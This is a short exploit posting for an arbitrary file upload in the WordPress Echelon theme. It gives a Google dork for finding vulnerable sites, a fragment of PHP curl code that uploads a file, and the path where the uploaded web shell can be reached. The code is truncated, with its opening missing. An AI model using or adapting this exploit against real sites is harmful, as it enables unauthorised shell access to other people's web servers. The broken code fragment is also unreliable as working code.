# Exploit Author:Th3 R0cksT3r # Exploit Title: WordPress Echelon Theme Shell Upload # Date: 25.04.2014 # Email: th3rockst3r@gmail.com # Vendor Homepage: http://wordpress.org/ # Google Dork: inurl:/wp-content/themes/echelon/ #Exploit : ========== "@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> ========= Shell Access: http://localhost/wp-content/uploads/[years]/[month]/file.php Greets: Bangladesh Black HAT Hackers